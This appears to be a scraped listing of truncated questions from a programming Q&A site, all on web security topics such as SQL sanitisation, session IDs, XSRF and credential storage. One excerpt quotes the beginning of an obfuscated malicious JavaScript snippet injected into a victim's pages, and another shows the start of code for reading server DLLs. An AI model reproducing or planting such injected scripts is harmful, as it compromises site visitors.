I have a system where employees can upload files. There are three ways:
Upload to my account in public, private or protected mode
Upload to department account in public, private or protected mode
Upload to organization account in public, private or protected mode
where public is visible to anyone, private to the group or person only...
Question: I'm using eval to parse a JSON return value from one of my WebMethods.
I prefer not to add jquery-json because the transfer volume is already quite large.
So I parse the JSON return value with eval.
Now rumors go that this is insecure. Why?
Nobody can modify the JSON return value unless they hack my server, in which case I...
So a bit of background, I'm working on an existing web application which has a set of users, who are able to log in via a traditional login screen with a user name and password, etc.
Recently we've managed to score a client (who have their own Intranet site), who are wanting to be able to have their users log into their Intranet site...
I got this SQL query where post_title is taken from $_GET:
$sql = "SELECT ID FROM posts WHERE posts.post_title = '5-design-web-colourful'";
What is the best way to sanitize this and make it more safe?
EDIT (as requested): I'm trying to create a plugin that works to hide a particular category (named private) and all of its posts forever...
I'm writing my own sessions controller that issues a unique id to a user once logged in, and then verifies and authenticates that unique id at every page load. What is the most secure way to generate such an id? Should the unique id be completely random? Is there any downside to including the user id as part of the unique id?
...
I'm wondering which additional security measures one could take besides a traditional login with user and password.
What do you think of this one:
_manually adding a cookie to each client which includes a secret key
_this cookie is not served by the webserver, it is actually copied "by hand" to each client computer
_if a client conn...
I work on a project known as the Security Development Lifecycle (SDL) project at Microsoft (http://microsoft.com/sdl) - in short it's a set of practices that must be used by product groups before they ship products to help improve security.
Over the last couple of years, we have published a great deal of SDL documentation, as customers ...
Hello,
To keep things simple, please allow the "assumption" that some code requires the use of a full URL, even though the domain is on the same server, i.e. a simple file path cannot be used.
TCP/IP?? Question:
If a form action target = "http://this-full-URL.com/postdata" (for example) and that URL is also on the same server, then whic...
I want to write a web-app which would ask the user to pass their google account (user and pwd) so that it can access their google data.
I understand google supports alternative ways to do this, such as AuthSub and OathAuthSub.
Also google discourages apparently clientLogin (which would be my approach) for web apps.
My question is:
if...
I have a method that attempts to update a SQL Server database in an ASP.NET application. If the update fails, it catches the exception and then queues the update in MSMQ, and then spins up a new thread that will later de-queue the pending update and try again. When the thread starts, it fails to open a database connection because it is a...
My goal is to become a good web developer. I'm interested in learning how to build complex websites as well as how to write web applications. I want skills that will enable me to write apps for <--insert hottest web trend here--> (Facebook & iphone apps for example)
This is one of my goals as far as Tech. is concerned. I'd also like...
Hi folks,
I've been storing SQL connection strings in web.conf, which is fine, but now I need to store SMTP credentials somewhere protected. web.conf seems like the likeliest place since it's protected, but how can they be stored?
I've added the details to my web.conf but am not sure how to reference them:
<system.net>
<mailSettings>
...
Hi,
I am on my dissertation in my final year at university at the moment. One of the areas I need to research is security - for both websites and for databases. I currently have sections on the following:
Website
Form security - such as data validation. This section is more about preventing errors made by legitimate users as much as ...
Hello all,
The ASP.NET WebForm view engine is quite flexible and easy to use in projects.
I have been facing a small problem recently. SECURITY!
I want my users to design the web pages in front. BUT!! With a small piece of code, people with bad intentions can get the content of my DLL files in the bin folder.
E.g.
<%
Syst...
I'm having significant difficulty locating the root cause for a secure/insecure message coming from IE. I've looked through the entire output and there are NO references to http:
I've searched for unsourced iframes, which cause this message, and there are none, and other than jQuery 1.4 there isn't even the text "iframe" in the source....
I've found out that my web pages (mainly index.php, main.html, include.inc) have been injected with a chunk of JavaScript code at the very bottom, after my original code.
<script>try {this.l="";var d=window[unescape("%75%6e%65%73%63%61%70%65")];var M;if(M!='' && M!='a'){M='bt'};var A="";var Mc=new String();var e=null;this.k="";var t;if(...
I have an existing j2ee application running on Oracle App Server. It is targeted towards paying customers so the content is secured and a SSO module properly intercepts all requests for secured content.
Now the company is adding an unbranded public-facing module with a number of unsecured pages. At one point the user is expected to reg...
Hi,
We are doing XSRF fixes for our code. We are using the session-token-to-request-token comparison method to achieve this. In case the session token is not equal to the request token, we will be redirecting to an error page.
Problem: Once we are on the Main Menu page, if the user refreshes the page, it throws an XSRF issue.
Reason: As there won...
What are the possible ways to authenticate user when websocket connection is used?
Example scenario: Web-based multi-user chat application through an encrypted websocket connection. How can I ensure (or guarantee) that each connection in this application belongs to a certain authenticated user and "can't be" exploited by false user impersona...
Hi
How do I protect files (documents, images, etc.) that are being sold over the internet?
Is it possible to deny access to all except a particular PHP file that lists those documents?
For instance www.mysite.com/list
dir tree:
+ myfiles
|
|--img1.jpg
|--doc.pdf
+ application
|-+controllers
|-lister.php
Can I grant access to the myfiles DIR on...